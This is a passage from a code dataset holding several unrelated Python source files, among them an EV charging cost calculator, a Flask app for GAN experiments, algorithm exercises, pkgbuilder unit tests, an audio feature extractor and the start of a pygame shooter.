function finds the price of each period.\n e.g. [0.5, 0.5] represents half price for both period\n \"\"\"\n price = []\n duration = Calculator.duration\n start_time = Calculator.start_time\n remaining_time = duration\n start_time = datetime.strptime(start_time, '%H:%M')\n # keep running until there are no time remaining\n # finds how long does each period last\n while remaining_time > 0:\n if Calculator.is_peak(self, start_time):\n price.append(1.0)\n else:\n price.append(0.5)\n hours = 1\n hours_added = timedelta(hours=hours)\n temp = start_time + hours_added\n next_hr = temp.hour\n next_hr_min = \"00\"\n temp2 = [str(next_hr), next_hr_min]\n next_hr_str = \":\".join(temp2)\n next_hour = datetime.strptime(next_hr_str, '%H:%M')\n time_to_next_hour = abs(next_hour - start_time).total_seconds() / 60.0\n\n dur = min(time_to_next_hour, remaining_time)\n remaining_time = remaining_time - dur\n start_time = next_hour\n\n return price\n\n # you may add more parameters if needed, you may also modify the formula.\n def time_calculation(self, initial_state, final_state, capacity, power):\n \"\"\"\n This function calculates the total time for the whole charging period\n \"\"\"\n time = ((float(final_state) - float(initial_state)) / 100 * float(capacity) / float(power)) * 60\n time_str = \"{:.2f}\".format(time)\n return time_str\n\n # you may create some new methods at your convenience, or modify these methods, or choose not to use them.\n def is_holiday(self, start_date):\n \"\"\"\n This functions checks if a date is a holiday in Australia\n \"\"\"\n date = Calculator.format_date(self, start_date)\n ref_date = Calculator.check_date(self, date)\n aus_holidays = holidays.AUS()\n if ref_date in aus_holidays:\n return True\n return False\n\n def is_peak(self, start_time):\n \"\"\"\n This function checks if a time is a peak hour\n \"\"\"\n peak_start = \"06:00\"\n peak_end = \"18:00\"\n peak_start_time = datetime.strptime(peak_start, '%H:%M')\n peak_end_time = datetime.strptime(peak_end, '%H:%M')\n return peak_start_time <= start_time < peak_end_time\n\n def get_charger_configuration(self, charger_config):\n \"\"\"\n This functions finds our the power and base price based on the charger configuration.\n \"\"\"\n config = int(charger_config)\n if config == 1:\n Calculator.power = 2\n Calculator.price = 5\n elif config == 2:\n Calculator.power = 3.6\n Calculator.price = 7.5\n elif config == 3:\n Calculator.power = 7.2\n Calculator.price = 10\n elif config == 4:\n Calculator.power = 11\n Calculator.price = 12.5\n elif config == 5:\n Calculator.power = 22\n Calculator.price = 15\n elif config == 6:\n Calculator.power = 36\n Calculator.price = 20\n elif config == 7:\n Calculator.power = 90\n Calculator.price = 30\n else:\n Calculator.power = 350\n Calculator.price = 50\n\n return Calculator.power\n\n def get_solar_energy_duration(self, data, start_time, charging_duration):\n \"\"\"\n This function checks if the whole charging duration is during the the solar period and return the amount of\n time in the solar period.\n e.g. Starts from 5 a.m. and have a duration of 3 hours. The sunrise is at 6:30 a.m. Hence, the final duration\n is only 1.5 hours.\n \"\"\"\n # check if the whole charging duration is during the solar period\n sunset = data[\"sunset\"]\n sunrise = data[\"sunrise\"]\n\n sunset_time = datetime.strptime(sunset, '%H:%M:%S')\n sunrise_time = datetime.strptime(sunrise, '%H:%M:%S')\n start_time = datetime.strptime(start_time, '%H:%M')\n\n # convert the charging session\n hours = int(float(charging_duration)) // 60\n\n # Get additional minutes with modulus\n minutes = int(float(charging_duration)) % 60\n\n # Create time as a string\n charging_session_str = \"{}:{}\".format(hours, minutes)\n charging_session_final = datetime.strptime(charging_session_str, '%H:%M')\n time_zero = datetime.strptime('00:00', '%H:%M')\n end_time = start_time - time_zero + charging_session_final\n duration = 0\n\n if start_time > sunset_time or end_time < sunrise_time:\n duration = 0\n # whole session in daylight\n elif sunrise_time < start_time < sunset_time and sunrise_time < end_time < sunset_time:\n duration = (charging_session_final.hour * 60) + charging_session_final.minute\n\n hour = start_time.hour\n minute = start_time.minute\n temp = [str(hour), str(minute)]\n str_start_time = \":\".join(temp)\n Calculator.start_time = str_start_time\n # start_time before sunrise but end_time before sunset\n elif start_time < sunrise_time and end_time < sunset_time:\n cal = end_time - timedelta(hours=sunrise_time.hour, minutes=sunrise_time.minute,\n seconds=sunrise_time.second)\n duration = (cal.hour * 60) + cal.minute\n hour = sunrise_time.hour\n minute = sunrise_time.minute\n temp = [str(hour), str(minute)]\n str_start_time = \":\".join(temp)\n Calculator.start_time = str_start_time\n\n # start_time after sunrise but end_time after sunset\n elif start_time > sunrise_time and end_time > sunset_time:\n cal = sunset_time - timedelta(hours=start_time.hour, minutes=start_time.minute, seconds=start_time.second)\n duration = (cal.hour * 60) + cal.minute\n\n hour = start_time.hour\n minute = start_time.minute\n temp = [str(hour), str(minute)]\n str_start_time = \":\".join(temp)\n Calculator.start_time = str_start_time\n\n Calculator.duration = duration\n return duration\n\n # to be acquired through API\n def get_day_light_length(self, data):\n \"\"\"\n This function calculates the daylight length based on the time of sunrise and sunset.\n \"\"\"\n\n sunset = data[\"sunset\"]\n sunrise = data[\"sunrise\"]\n\n sunset_time = datetime.strptime(sunset, '%H:%M:%S')\n sunrise_time = datetime.strptime(sunrise, '%H:%M:%S')\n daylight_len = sunset_time - sunrise_time\n str_day_len = str(daylight_len)\n temp = str_day_len.split(\":\")\n minutes = int(temp[1])/60\n dl = int(temp[0]) + minutes\n format_dl = \"{:.4f}\".format(dl)\n return format_dl\n\n # to be acquired through API\n def get_solar_insolation(self, data):\n \"\"\"\n This function finds the solar insolation from the weather API\n \"\"\"\n solar_insolation = data[\"sunHours\"]\n return solar_insolation\n\n # to be acquired through API\n def get_cloud_cover(self, data, start_time):\n \"\"\"\n This function retrieve hourly cloud value from the weather API\n \"\"\"\n cloud_cover = data[\"hourlyWeatherHistory\"][int(start_time)][\"cloudCoverPct\"]\n return cloud_cover\n\n def solar_energy_cal_without_future(self, date, postcode, start_time, charging_duration, location):\n \"\"\"\n This function calculates the solar energy only considering the date from 1st July 2008 up to the current date-2\n only without considering hourly weather conditions.\n Formula : si * du/dl * 50 * 0.20\n \"\"\"\n # calculate the solar energy based on AlG 1\n total = 0\n final_total = []\n weather_data = Calculator.get_link_weather(self, postcode)\n # retrieve data from the weather API\n data = Calculator.get_weather(self, weather_data, date, location)\n # retrieve solar insolation\n si = Calculator.get_solar_insolation(self, data)\n # retrieve daylight length\n dl = Calculator.get_day_light_length(self, data)\n # calculates the duration\n Calculator.get_solar_energy_duration(self, data, start_time, charging_duration)\n du = Calculator.get_du(self)\n # calculate the solar energy for each partial period\n for i in range(len(du)):\n total = float(si) * du[i] / float(dl) * 50 * 0.2\n final_total.append(\"{:.4f}\".format(total))\n return final_total, du\n\n def get_du(self):\n \"\"\"\n This function finds the amount of time in an hour depending on the number of periods and returns returns an\n array that has the amount of time in an hour\n e.g. [1.0, 0.5] represents full 1 hour + 30 min for the second period\n \"\"\"\n du = []\n duration = Calculator.duration\n start_time = Calculator.start_time\n remaining_time = duration\n start_time = datetime.strptime(start_time, '%H:%M')\n while remaining_time > 0:\n hours = 1\n hours_added = timedelta(hours=hours)\n temp = start_time + hours_added\n next_hr = temp.hour\n next_hr_min = \"00\"\n temp2 = [str(next_hr), next_hr_min]\n next_hr_str = \":\".join(temp2)\n next_hour = datetime.strptime(next_hr_str, '%H:%M')\n time_to_next_hour = abs(next_hour - start_time).total_seconds() / 60.0\n\n dur = min(time_to_next_hour, remaining_time)\n duration = dur / 60\n remaining_time = remaining_time - dur\n start_time = next_hour\n du.append(duration)\n return du\n\n def solar_energy_with_future(self, date, postcode, start_time, charging_duration, location):\n \"\"\"\n This function calculates the solar energy with the date extending to the future. Moreover, the calculation needs\n to take into account hourly weather conditions\n Formula : si * du/dl * (1-cc/100) * 50 * 0.20\n \"\"\"\n # calculate the solar energy based on ALG2 for a year\n total = 0\n final_total = []\n # retrieve data from the weather api\n weather_data = Calculator.get_link_weather(self, postcode)\n data = Calculator.get_weather(self, weather_data, date, location)\n # retrieve solar insolation, daylight length and duration\n si = Calculator.get_solar_insolation(self, data)\n dl = Calculator.get_day_light_length(self, data)\n Calculator.get_solar_energy_duration(self, data, start_time, charging_duration)\n du = Calculator.get_du(self)\n \n # for each partial hour, the solar energy was calculated\n for i in range(len(du)):\n temp = start_time.split(\":\")\n hr_num = int(temp[0]) + i\n print(hr_num,start_time)\n cc = Calculator.get_cloud_cover(self, data, str(hr_num))\n total = float(si) * du[i] / float(dl) * (1-cc/100) * 50 * 0.2\n final_total.append(\"{:.4f}\".format(total))\n\n return final_total, du\n\n def solar_energy_cal_preceeding_years(self, date, postcode, start_time, charging_duration, location):\n \"\"\"\n This function calculates the solar energy for the preceeding years\n \"\"\"\n total = []\n date = Calculator.format_date(self, date)\n \n # calculate the solar energy for the preceeding years\n for i in range(3):\n ref_date = Calculator.check_date(self, date)\n temp = ref_date.split(\"-\")\n year = int(temp[0]) - i\n temp.insert(0, str(year))\n temp.pop(1)\n ref_date2 = \"-\".join(temp)\n energy = Calculator.solar_energy_with_future(self, ref_date2, postcode, start_time, charging_duration, location)\n total.append(energy)\n\n return total\n\n def get_link_weather(self, postcode):\n \"\"\"\n This function retrieve data from the location API\n \"\"\"\n url = 'http://118.138.246.158/api/v1/location?postcode={postcode}'.format(postcode=postcode)\n temp = requests.get(url)\n data = temp.json()\n\n return data\n\n def get_weather(self, data, date, location):\n \"\"\"get information from weather api through the postcode \"\"\"\n location = location.upper()\n for i in range(len(data)):\n location_name = data[i][\"name\"]\n if location_name == location:\n location = data[i][\"id\"]\n break\n\n ref_date = Calculator.check_date(self, date)\n weather_url = 'http://118.138.246.158/api/v1/weather?location={ID}&date={date}'.format(ID=location, date=ref_date)\n\n weather = requests.get(weather_url)\n data = weather.json()\n return data\n\n def check_date(self, date):\n \"\"\" check for reference date\"\"\"\n current_date = datetime.today().strftime('%Y-%m-%d')\n current = current_date.split(\"-\")\n current_year = int(current[0])\n input = date.split(\"-\")\n input_year = int(input[0])\n if input_year > current_year:\n input.pop(0)\n input.insert(0, str(current_year))\n\n # check for future month\n if int(input[1]) > int(current[1]):\n current_month = int(current[1])\n input_month = int(input[1])\n if input_month > current_month:\n input.pop(1)\n input.insert(1, str(current_month))\n\n if int(input[2]) > int(current[2]):\n input.pop(2)\n input.insert(2, current[2])\n\n # check if the day valid for that new month\n days = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n if int(input[2]) > days[int(input[1])]:\n year = int(input[0])\n # leap year condition\n if (year % 400 == 0) or (year % 100 != 0) and (year % 4 == 0):\n if int(input[1]) == 2:\n input.insert(0, \"29\")\n else:\n input.insert(0, str(days[int(input[1])]))\n input.pop(1)\n date_time_obj = datetime(int(input[0]), int(input[1]), int(input[2]))\n final_time = date_time_obj.strftime(\"%Y-%m-%d\")\n return final_time\n\n def format_date(self, date):\n \"\"\"\n format the date into an acceptable format for the API\n \"\"\"\n temp = date.split(\"/\")\n temp.reverse()\n final_date = \"-\".join(temp)\n return final_date\n","repo_name":"sookmun/FIT2017-Software-Testing","sub_path":"app/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":20240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19596101549","text":"import autograd.numpy as np\nimport argparse\nimport json\nimport ast\n\nfrom json_parser import parse\nfrom utils import *\n\n\ndef add_assertion(args, spec):\n assertion = dict()\n\n assertion['robustness'] = 'local'\n assertion['distance'] = 'di'\n assertion['eps'] = '1e9' # eps is not necessary in this experiment\n\n spec['assert'].update(assertion)\n\n\ndef add_solver(args, spec):\n solver = dict()\n\n solver['algorithm'] = args.algorithm\n if args.algorithm == 'sprt':\n solver['threshold'] = str(args.threshold)\n solver['alpha'] = '0.05'\n solver['beta'] = '0.05'\n solver['delta'] = '0.005'\n\n spec['solver'] = solver\n\n\ndef main():\n np.set_printoptions(threshold=20)\n parser = argparse.ArgumentParser(description='nSolver')\n\n parser.add_argument('--spec', type=str, default='spec.json',\n help='the specification file')\n parser.add_argument('--algorithm', type=str,\n help='the chosen algorithm')\n parser.add_argument('--threshold', type=float,\n help='the threshold in sprt')\n parser.add_argument('--eps', type=float,\n help='the distance value')\n parser.add_argument('--dataset', type=str,\n help='the data set for fairness experiments')\n\n args = parser.parse_args()\n\n with open(args.spec, 'r') as f:\n spec = json.load(f)\n\n add_assertion(args, spec)\n add_solver(args, spec)\n\n model, assertion, solver, display = parse(spec)\n\n if args.dataset == 'bank':\n pathX = 'benchmark/causal/bank/data/'\n pathY = 'benchmark/causal/bank/data/labels.txt'\n elif args.dataset == 'census':\n pathX = 'benchmark/causal/census/data/'\n pathY = 'benchmark/causal/census/data/labels.txt'\n elif args.dataset == 'credit':\n pathX = 'benchmark/causal/credit/data/'\n pathY = 'benchmark/causal/credit/data/labels.txt'\n elif args.dataset == 'FairSquare':\n pathX = 'benchmark/causal/FairSquare/data/'\n pathY = 'benchmark/causal/FairSquare/data/labels.txt'\n\n y0s = np.array(ast.literal_eval(read(pathY)))\n\n assertion['x0'] = pathX + 'data' + str(0) + '.txt'\n\n solver.solve(model, assertion)\n\n\n print('\\n============================\\n')\n\nif __name__ == '__main__':\n main()\n","repo_name":"longph1989/Socrates","sub_path":"source/run_causal.py","file_name":"run_causal.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"16968259377","text":"\nimport sys\nsys.stdin = open('1715.txt')\n\nimport heapq\n# 최소한의 비교\n# 정렬해야될듯?\n\nN = int(input())\n\nheap = []\nfor _ in range(N):\n heapq.heappush(heap, int(input()))\n\nresult = 0\nfor _ in range(N-1):\n num1 = heapq.heappop(heap)\n num2 = heapq.heappop(heap)\n sumNum = num1 + num2\n heapq.heappush(heap, sumNum)\n result += sumNum\n\nprint(result)\n","repo_name":"wdahlia/Python-Algorithm","sub_path":"백준/1715_카드정렬하기.py","file_name":"1715_카드정렬하기.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"4776176518","text":"import os\nimport json\nfrom flask import Flask, render_template, url_for, request, flash, redirect\nfrom werkzeug.utils import secure_filename\nfrom flask import jsonify\n\n#My modules\nfrom config import Config\nfrom app.forms import CreateProject_form, CreateExperiment_form\nfrom app.misc import loadGans\nfrom app.projects import Project\nfrom app.experiment import Experiment\n\n# from views import projects_window\n\napp_dict = {} # main dictionary file to keep project info\n\n#UPLOAD_FOLDER = '/path/to/the/uploads'\n#ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\napp = Flask(__name__)\napp.config.from_object(Config)\n#app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\n#projects\n@app.route(\"/\", methods = [\"GET\" , \"POST\"])\ndef projects_window():\n form = CreateProject_form()\n\n init_app()\n print(app_dict)\n\n if form.validate_on_submit():\n \n project = Project(form.projectName.data, form.projectPath.data)\n app_dict[project.name] = project.full_path\n print(\"Added project path and created a project in\", project.json_file)\n save_app_json(app_dict)\n\n #return redirect(url_for('projects_window', form = form))\n return render_template('projects.htm', form = form, app_dict = app_dict)\n\n return render_template('projects.htm', form = form, app_dict = app_dict)\n\n# Experiments\n# theProject window (a window to create experiments)\n@app.route(\"/\", methods = [\"GET\" , \"POST\"])\ndef theProjet(project_name):\n \n # sampleDict = {\"GAN1\": \"Normal GAN\", \"GAN2\" : \"Conditional GAN\"}\n\n ganTypes = loadGans(\"json/gans.json\")\n\n #print(testArray)\n\n form = CreateExperiment_form()\n\n # update choices\n form.ganType.choices = ganTypes #[('cpp', 'C++'), ('py', 'Python')]\n print(\"object created...!\")\n project_path = app_dict[project_name]\n\n \n\n if form.validate_on_submit():\n \n exp = Experiment(form.expName.data, project_name, project_path)\n print(\"EXP Name:\", exp.expName)\n return render_template('theproject.htm', projectName=project_name, projectPath = project_path, form=form)\n\n\n return render_template('theproject.htm', projectName=project_name, projectPath = project_path, form=form)\n\n\n@app.route(\"/home/\")\ndef home(project_name):\n #p_data = request.get_json() # get project name and path from the click of the project\n #print(p_data)\n return render_template('home.htm', projectName=project_name, projectPath = \"\")\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.htm\", title= \"About\")\n\n\n\n## access file of the OS\n@app.route(\"/upload\")\ndef upload_file():\n return render_template(\"upload.htm\")\n\n@app.route(\"/train\")\ndef train_tab():\n return render_template(\"train.htm\")\n\n@app.route(\"/interactive\")\ndef interactive():\n print(\"This is working\")\n return render_template(\"interactive.htm\")\n \n@app.route(\"/run_test_task\", methods=['POST'])\ndef test_task():\n print(\"Test task is OK...\")\n return render_template(\"train.htm\")\n\n\n@app.route('/background_process_1')\ndef background_process_1():\n try:\n print(\"Test\")\n lang = request.args.get('proglang', 0, type=str)\n if lang.lower() == 'python':\n return jsonify(result='You are ggod')\n\n else:\n return jsonify(result='test')\n except Exception as e:\n return str(e)\n\n\n@app.route('/background_process')\ndef background_process():\n \n try:\n lang = request.args.get('proglang', 0, type=str)\n # print(\"Test\")\n if lang.lower() == 'python':\n return jsonify(result='You are wise')\n else:\n return jsonify(result='Try again.')\n except Exception as e:\n return str(e)\n\n######### Init app and save app dictionary #########\ndef init_app():\n global app_dict\n\n if os.path.isfile(\"json/app.json\"):\n\n print(\"Json file found\")\n with open(\"json/app.json\") as pf:\n # global projects_dict\n app_dict = json.load(pf)\n pf.close()\n print(app_dict)\n else:\n with open(\"json/app.json\", \"w+\") as pf:\n # global projects_dict\n json.dump(app_dict, pf)\n pf.close()\n\ndef save_app_json(app_dict):\n with open(\"json/app.json\", \"w+\") as pf:\n # global projects_dict\n json.dump(app_dict, pf)\n pf.close()\n\nif __name__ == \"__main__\":\n \n app.run(debug=True)\n ","repo_name":"vlbthambawita/GANExFlask","sub_path":"backup_all/GANEX/GANEX/ganex_main.py","file_name":"ganex_main.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6307574691","text":"from typing import List\nimport math\n\nclass Attempt:\n def maxProfit(self, prices: List[int]) -> int:\n \n n = len(prices)\n max_profits = [0] * n\n \n s = 0\n slow_profit = 0\n min_price = prices[0]\n \n for i in range(1, n):\n \n kadane = prices[i] - prices[i-1]\n \n if kadane > 0:\n \n curr_profit = max(0, prices[i] - min_price)\n curr_profit += max_profits[s-2] if s-2 >= 0 else 0\n slow_profit = max(slow_profit, curr_profit)\n \n fast_profit = kadane\n fast_profit += max_profits[i-3] if i-3 >= 0 else 0\n\n if fast_profit > slow_profit:\n s, slow_profit, min_price = i-1, fast_profit, prices[i-1]\n max_profits[i] = fast_profit\n else:\n max_profits[i] = slow_profit\n \n else:\n \n max_profits[i] = max_profits[i-1]\n \n i += 1\n \n return max_profits[-1]\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n hold, sell, cool = -math.inf, 0, 0\n \n for price in prices:\n prev_hold, prev_sell, prev_cool = hold, sell, cool\n \n hold = max(prev_hold, prev_cool - price)\n sell = prev_hold + price\n cool = max(prev_cool, prev_sell)\n \n return max(cool, sell)\n\n# https://leetcode.com/problems/best-time-to-buy-and-sell-stock-with-cooldown/discuss/761981/PythonGo-O(n)-by-DP-and-state-machine.-w-Visualization","repo_name":"oscarchankalung/leetcode","sub_path":"Solutions/13 Dynamic Programming/309 Best Time to Buy and Sell Stock with Cooldown.py","file_name":"309 Best Time to Buy and Sell Stock with Cooldown.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74032780908","text":"############\n# This is the part for the theorical question:\n# You are given a string, s. Let's define a subsequence as the subset of characters \n# that respects the order we find them in s. For instance, a subsequence of \"DATAMINING\" \n# is \"TMNN\". Your goal is to define and implement an algorithm that finds the length of \n# the longest possible subsequence that can be read in the same way forward and backwards. \n# For example, given the string \"DATAMININGSAPIENZA\" the answer should be 7 \n# (dAtamININgsapIenzA)\n############\n\ns = \"DATAMININGSAPIENZA\" # defined Sequence\nnalgo4 = len(s)\n\n## creating a table of rows and column equal to len of string\nDST= [[0 for i in range(nalgo4)]for i in range (nalgo4)]\n\n# for all values where length of sub sequence is 1\nfor i in range (nalgo4):\n DST[i][i] = 1\n \n# for all values where length of subsequence is more than 1\n# we make a loop for the lengths of sub-sequence \nfor sseq in range(2, nalgo4+1): \n for i in range(nalgo4-sseq+1):\n j = i+sseq-1\n if (s[i] == s[j] and sseq == 2): #conditioning for length 2 subsequences\n DST[i][j] = 2\n elif s[i] == s[j]: #conditioning for all sseq greater than 2\n DST[i][j] = DST[i+1][j-1] + 2\n else:\n DST[i][j] = max(DST[i][j-1], DST[i+1][j])\n\nprint(\"The Longest Palindromic sub Sequence is \", DST[0][nalgo4-1])\n","repo_name":"frapez1/Algorithmic-Methods-of-Data-Mining","sub_path":"HW-3/exercise_4.py","file_name":"exercise_4.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18189014332","text":"import unittest\nimport pkgbuilder\nimport pkgbuilder.__main__\nimport pkgbuilder.aur\nimport pkgbuilder.build\nimport pkgbuilder.pbds\nimport pkgbuilder.upgrade\nimport pkgbuilder.utils\nimport pkgbuilder.wrapper\n\n\nclass TestPB(unittest.TestCase):\n maxDiff = None\n # It’s cheaper to use existing package data.\n fpkg = pkgbuilder.package.AURPackage.from_aurdict({\n 'Description': 'A Python AUR helper/library.', 'CategoryID': 16, 'ID':\n 52542, 'Maintainer': 'Kwpolska',\n 'Depends': ['python', 'pyalpm>=0.5.1-1', 'python-requests', 'asp'],\n 'URLPath': '/packages/pk/pkgbuilder/pkgbuilder.tar.gz', 'Version':\n '3.2.0-1', 'PackageBase': 'pkgbuilder', 'FirstSubmitted': 1316529993,\n 'OutOfDate': 1000, 'NumVotes': 19, 'Name': 'pkgbuilderts', 'LastModified':\n 1395757472, 'URL': 'https://github.com/Kwpolska/pkgbuilder', 'License':\n ['BSD'], 'Popularity': 7, 'Keywords': ['foo', 'bar']})\n\n def setUp(self):\n \"\"\"Start stuff.\"\"\"\n pkgbuilder.DS._pycreload()\n #self.patches = [mock.patch('pkgbuilder.aur.AUR.request', self._aurinforequest)]\n #for p in self.patches:\n #p.start()\n\n #def tearDown(self):\n #for p in self.patches:\n #p.stop()\n\n def test_aur(self):\n pkgbuilder.aur.AUR()\n\n def test_pbds(self):\n pkgbuilder.pbds.PBDS()\n\n def test_pbds_logging(self):\n pbds = pkgbuilder.pbds.PBDS()\n pbds.log.debug('PB unittest/TestPB is running now on this machine.')\n\n def test_utils_print_package_search(self):\n sample = ('aur/pkgbuilderts 3.2.0-1 (19 votes) '\n '\\x1b[1;1m\\x1b[1;31m[out of date]\\x1b[1;0m\\n'\n ' A Python AUR helper/library.')\n\n req = pkgbuilder.utils.print_package_search(self.fpkg, True)\n self.assertEqual(req, sample)\n\n def test_utils_print_package_info(self):\n sample = ('Repository : aur\\n'\n 'Name : pkgbuilderts\\n'\n 'Package Base : pkgbuilder\\n'\n 'Version : 3.2.0-1\\n'\n 'URL : https://github.com/Kwpolska/pkgbuilder\\n'\n 'Licenses : BSD\\n'\n 'Groups : None\\n'\n 'Provides : None\\n'\n 'Depends On : python pyalpm>=0.5.1-1 python-requests asp\\n'\n 'Make Deps : None\\n'\n 'Check Deps : None\\n'\n 'Optional Deps : None\\n'\n 'Conflicts With : None\\n'\n 'Replaces : None\\n'\n 'Votes : 19\\n'\n 'Popularity : 7\\n'\n 'Out of Date : \\x1b[1;1m\\x1b[1;31myes\\x1b[1;0m\\n'\n 'Maintainer : Kwpolska\\nFirst Submitted: '\n '2011-09-20T14:46:33Z\\nLast Updated : '\n '2014-03-25T14:24:32Z\\nDescription : '\n 'A Python AUR helper/library.\\n'\n 'Keywords : foo bar\\n')\n\n req = pkgbuilder.utils.print_package_info([self.fpkg], True)\n self.assertEqual(req, sample)\n\n def test_main(self):\n # Can’t test too much here…\n pkgbuilder.__main__.main([])\n\n def test_wrapper(self):\n # …or there…\n pkgbuilder.wrapper.wrapper(['unittests', 'UTshibboleet'])\n\n def test_pb_help(self):\n \"\"\"Make sure ``pb --help`` works\"\"\"\n import sys\n from io import StringIO\n capture = StringIO()\n stdout = sys.stdout\n try:\n sys.stdout = capture\n pkgbuilder.wrapper.wrapper('--help')\n finally:\n sys.stdout = stdout\n\n # More interested in if the above erred rather than the actual output\n self.assertTrue(capture.getvalue())\n\n def test_call_pacman(self):\n \"\"\"Make sure ``pb`` command can call pacman\"\"\"\n\n pacman = pkgbuilder.DS.paccommand\n try:\n pkgbuilder.DS.paccommand = 'true'\n pkgbuilder.wrapper.wrapper(['-Qh'])\n finally:\n pkgbuilder.DS.paccommand = pacman\n","repo_name":"Kwpolska/pkgbuilder","sub_path":"tests/test_pkgbuilder.py","file_name":"test_pkgbuilder.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"37"} +{"seq_id":"18584288147","text":"import pickle\n\n\nclass Message:\n @staticmethod\n def serialize(\n hostname,\n worker_name,\n message_type,\n message_value,\n ):\n message = [\n hostname,\n worker_name,\n message_type,\n message_value,\n ]\n\n serialized_message = pickle.dumps(\n obj=message,\n )\n\n return serialized_message\n\n @staticmethod\n def unserialize(\n message,\n ):\n unserialized_message = pickle.loads(\n data=message,\n encoding='utf-8',\n )\n\n hostname = unserialized_message[0]\n worker_name = unserialized_message[1]\n message_type = unserialized_message[2]\n message_value = unserialized_message[3]\n\n message = {\n 'hostname': hostname,\n 'worker_name': worker_name,\n 'type': message_type,\n 'value': message_value,\n }\n\n return message\n","repo_name":"NattieRavid/tasker","sub_path":"tasker/monitor/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42815754412","text":"from django.urls import path\n\nfrom .views import (\n BoardList, \n BoardDetail,\n BoardListByUser,\n BoardListByLike\n)\nfrom .views import CommentList, CommentDetail\nfrom .views import LikeList, LikeDetail\n\nurlpatterns = [\n path('', BoardList.as_view(), name = BoardList.name),\n path('/', BoardDetail.as_view(), name = BoardDetail.name),\n path('user/like//', BoardListByLike.as_view(), name = BoardListByLike.name),\n path(\"search/user//\", BoardListByUser.as_view(), name = BoardListByUser.name),\n path('comment/', CommentList.as_view(), name = CommentList.name),\n path('comment//', CommentDetail.as_view(), name = CommentDetail.name),\n path('like/', LikeList.as_view(), name = LikeList.name),\n path('like//', LikeDetail.as_view(), name = LikeDetail.name),\n]","repo_name":"HodongMan/Remover-Server","sub_path":"timeline/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15353022647","text":"'''\nКоординаты вершин клеток - целые числа. Разрешается движение только по диагоналям клеток.\nПо данным координатам точки найти длину кратчайшего пути от начала координат до этой точки\nс округлением до целого числа. Если такой путь не существует, вывести 0.\nФормат входных данных\nДва целых числа, −19 6 X, Y 6 19,(X, Y ) 6= (0, 0).\nФормат выходных данных\nНеотрицательное целое число.\nПримеры\n\nстандартный ввод\n4 0\n\nстандартный вывод\n6\n\nстандартный ввод\n-3 4\n\nстандартный вывод\n0\n\n'''\n\nimport math\n\ndef get_diag_len( x, y ):\n if (x - y) % 2:\n return 0\n else:\n return round( max( abs(x), abs(y) ) * math.sqrt(2) )\n\nx, y = map(int, input().split())\n\nprint(get_diag_len(x, y))\n","repo_name":"zhanybekovich/31github","sub_path":"OlympKRSU/2019-2020/day1/1004-diagonals.py","file_name":"1004-diagonals.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7820223623","text":"from torch import nn\nfrom torchaudio import transforms as T\nfrom nnAudio import features as S\n\n\nclass FeatureExtractor(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.feat = S.MelSpectrogram(sr=config['sample_rate'],\n n_fft=config['win_length'],\n win_length=config['win_length'],\n n_mels=config['n_mels'],\n hop_length=config['hop_length'],\n fmin=config['fmin'],\n fmax=config['fmax'],\n center=True)\n self.db = T.AmplitudeToDB(stype='power', top_db=80)\n\n def forward(self, audio):\n feature = self.feat(audio)\n feature = self.db(feature)\n\n return feature\n\n def _freeze(self, model):\n for name, child in model.named_children():\n for param in child.parameters():\n param.requires_grad = False\n self._freeze(child)\n","repo_name":"seyong92/phoneme-informed-note-level-singing-transcription","sub_path":"phn_ast/feature.py","file_name":"feature.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"37"} +{"seq_id":"74980240107","text":"import pygame\nimport random\nimport os\nimport sys\n\n# Global Variables\nWIDTH = 700 # Width of screen\nHEIGHT = 900 # Height of screen\nFPS = 60 # Game fps\nPSPEED = 5 # Player speed\nPOWERUP_TIME = 5000\n\n# Define colors\nBLACK = (0,0,0)\nWHITE = (255,255,255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\n# Initializes pygame and creates game window\npygame.init()\npygame.mixer.init()\nscreen = pygame.display.set_mode((WIDTH, HEIGHT+3))\npygame.display.set_caption(\"STARFIGHTER\")\nclock = pygame.time.Clock()\n\n# Set up assets folder\ngameFolder = os.path.dirname(__file__)\nimgFolder = os.path.join(gameFolder, \"images\")\nsndFolder = os.path.join(gameFolder, \"sounds\")\n\n# Initializing font\nfontName = pygame.font.match_font('arial')\n\n# Text Draw\ndef draw_text(surf, text, fontSize, x, y):\n font = pygame.font.Font(fontName, fontSize)\n textSurf = font.render(text, True, WHITE)\n textRect = textSurf.get_rect()\n textRect.midtop = (x, y)\n surf.blit(textSurf, textRect)\n\n# Creates new enemy\ndef new_mob(sprite,spriteGroup):\n m = sprite()\n allSprites.add(m)\n 